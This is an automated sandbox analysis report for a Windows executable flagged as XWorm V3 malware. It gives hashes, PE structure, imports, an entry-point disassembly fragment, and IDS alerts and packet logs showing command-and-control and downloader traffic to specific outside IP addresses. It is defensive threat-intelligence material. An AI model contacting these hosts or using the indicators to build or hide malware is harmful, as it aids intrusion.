Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............".8...f................@......................................`....`... ..............................................................0..................................................(.......................p............................text...H6.......8..................`.P`.data... ....P.......<..............@.P..rdata.......`.......>..............@.`@.pdata.......0......................@.0@.xdata...2...P...2..................@.0@.bss.... .............................`..idata...............N..............@.0..CRT....p............`..............@.@..tls.................b..............@.@..reloc...............d..............@.0B................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.367150840935163
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
File size:	354'816 bytes
MD5:	ff0badeb5d6675c36d8f9068a1232258
SHA1:	7d287ad2bcdce85532dea445371a2d3c8295e516
SHA256:	5b64cb5b788ccdd6006a7edefe6dcd1d36c9bf09101b53398e6a5938a1cc29c8
SHA512:	de4a382bf267c27279727f03a898b817e4b4058907fbae384c4368cfe35bb0b8184ca8678de3a426bdce0d4d62027cc3a634ff0be48549c0a32f9bede9365664
SSDEEP:	6144:/GNiI1KTTWXe8D1LYWoNxQOlEJESR0HN98er80du7gZPqhHsETDdtlz42AVFAnS:/GNUuXnDNbIxQWMExt+ei7g9qW+J/eV2
TLSH:	86747C17F6E1A9BCE16AC07483569673BA37B88D0220397F53D486343E66E202F5DF19
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............".8...f................@......................................`....`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66B394B1 [Wed Aug 7 15:37:21 2024 UTC]
TLS Callbacks:	0x41ca20
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	827e46eec0f766fadcee4c8501e1de53

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00050B35h]
mov dword ptr [eax], 00000000h
call 00007FFAF466A54Fh
call 00007FFAF462899Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007FFAF466A3CCh
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007FFAF4628CF9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
inc ecx
push edi
inc ecx
push esi
inc ecx
push ebp
inc ecx
push esp
push esi
push edi
push ebp
push ebx
dec eax
sub esp, 000000F8h
inc esp
mov byte ptr [esp+4Fh], cl
dec esp
mov dword ptr [esp+50h], eax
dec ecx
mov esi, edx
dec eax
mov edi, ecx
dec ecx
mov esp, 00000000h
add byte ptr [eax], al
add byte ptr [eax-6F6672B8h], al
add dword ptr [eax], eax
add byte ptr [ebp+ecx*4-57h], cl
cwde
add dword ptr [eax], eax
add byte ptr [eax-73h], cl
insb
and al, 70h
dec esp
lea edi, dword ptr [ecx+00000168h]
dec eax
lea eax, dword ptr [ecx+30h]
dec eax
mov dword ptr [esp+000000A0h], eax
dec eax
lea eax, dword ptr [ecx+58h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a000	0x10a8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x53000	0x1adc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0x4c4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x51c00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5a410	0x370	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x43648	0x43800	3d10269cfb91c9b23c32fb5d687fb443	False	0.5322771990740741	data	6.351920157698596	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x45000	0x120	0x200	3b43ab94eff15a1e16f6e89933e63877	False	0.142578125	data	0.7505333305125921	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x46000	0xc080	0xc200	01694037a9e9bcac5939ab5ff90c4206	False	0.40757893041237114	data	5.586527256303149	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x53000	0x1adc	0x1c00	6e204c08cda11f782adfde8ff82ec133	False	0.4877232142857143	data	5.446254059490632	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x55000	0x3200	0x3200	562233c964b6e7288bd9b42a08383387	False	0.3765625	data	5.468108910686631	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x59000	0xa20	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x10a8	0x1200	c4f18e333c49f18f8c1daa24275320ca	False	0.3207465277777778	data	4.315940831752453	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5c000	0x70	0x200	51d2a3d3e0eeb5fc057196d73692bf6a	False	0.083984375	data	0.3281187745953951	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5d000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5e000	0x4c4	0x600	eafe9c2ec4b39419542aeea47f3ea9da	False	0.560546875	data	4.796357731350743	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	AddVectoredExceptionHandler, CloseHandle, CopyFileExW, CreateDirectoryW, CreateFileMappingA, CreateFileW, CreateToolhelp32Snapshot, DuplicateHandle, FindClose, FindFirstFileW, FormatMessageW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFullPathNameW, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStdHandle, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, MapViewOfFile, Module32FirstW, Module32NextW, MultiByteToWideChar, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetFileInformationByHandle, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, WaitForSingleObject, WriteConsoleW
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
ADVAPI32.dll	SystemFunction036
bcrypt.dll	BCryptGenRandom
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, RaiseException, RtlAddFunctionTable, RtlUnwindEx, TerminateProcess, UnhandledExceptionFilter, VirtualProtect, VirtualQuery, __C_specific_handler
msvcrt.dll	__getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, signal, strlen, strncmp, vfprintf
ntdll.dll	NtWriteFile, RtlNtStatusToDosError

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-08T02:38:40.864390+0200	TCP	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	49746	20343	192.168.2.4	147.185.221.16
2024-08-08T02:36:24.326130+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49739	443	192.168.2.4	104.21.28.76
2024-08-08T02:36:16.355177+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49732	443	192.168.2.4	104.21.28.76
2024-08-08T02:36:44.411331+0200	TCP	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	49740	20343	192.168.2.4	147.185.221.16
2024-08-08T02:36:01.741479+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	49730	443	192.168.2.4	104.21.28.76
2024-08-08T02:36:26.755485+0200	TCP	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	49731	20343	192.168.2.4	147.185.221.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2024 02:36:00.822510004 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:00.822541952 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:00.822659969 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:00.845756054 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:00.845774889 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.326553106 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.326622963 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.381254911 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.381274939 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.381745100 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.381792068 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.383996010 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.424526930 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741492033 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741643906 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741683960 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741708994 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741724014 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741755962 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741764069 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741812944 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741820097 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741863966 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741869926 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741918087 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741925001 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.741967916 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.741974115 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.742019892 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.742141962 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.742196083 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.742232084 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.742280006 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.742312908 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.742361069 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.746095896 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.746165991 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.829777002 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.829963923 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.830013037 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.830035925 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.830048084 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.830091000 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.830095053 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.830142021 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.862971067 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863059044 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863121033 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863147974 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863157034 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863189936 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863210917 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863218069 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863233089 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863291025 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863297939 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863323927 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863352060 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863363981 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.863375902 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.863425016 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865397930 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865483046 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865525007 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865550995 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865559101 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865580082 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865602016 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865605116 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865642071 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865647078 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865688086 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865689039 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865704060 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865725994 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865756035 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865761995 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865798950 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865842104 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865849018 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865856886 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.865884066 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.865901947 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.918297052 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.918420076 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.918431044 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.918474913 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.918512106 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.918668985 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.918723106 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.918730021 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.918773890 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.944881916 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.944962978 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.972656012 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.972706079 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.972742081 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.972753048 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.972778082 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.972791910 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.973052025 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.973109007 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.974229097 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.974299908 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.974370003 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.974421978 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.974488020 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.974535942 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.974575043 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.974627018 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.975390911 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.975452900 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.975480080 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.975541115 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.976185083 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.976238966 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.976329088 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.976382017 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.977148056 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.977215052 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.977235079 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.977289915 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:01.978037119 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:01.978102922 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.007390022 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.007457972 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.007498026 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.007555008 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.033296108 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.033379078 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.033418894 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.033510923 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.033528090 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.033646107 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.033653021 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.033669949 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:02.033690929 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.033710003 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.078887939 CEST	49730	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:02.078907013 CEST	443	49730	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:06.215801001 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:06.220854044 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:06.221102953 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:06.630614996 CEST	49731	20343	192.168.2.4	147.185.221.16
Aug 8, 2024 02:36:06.636010885 CEST	20343	49731	147.185.221.16	192.168.2.4
Aug 8, 2024 02:36:15.430533886 CEST	49732	443	192.168.2.4	104.21.28.76
Aug 8, 2024 02:36:15.430578947 CEST	443	49732	104.21.28.76	192.168.2.4
Aug 8, 2024 02:36:15.430649996 CEST	49732	443	192.168.2.4	104.21.28.76
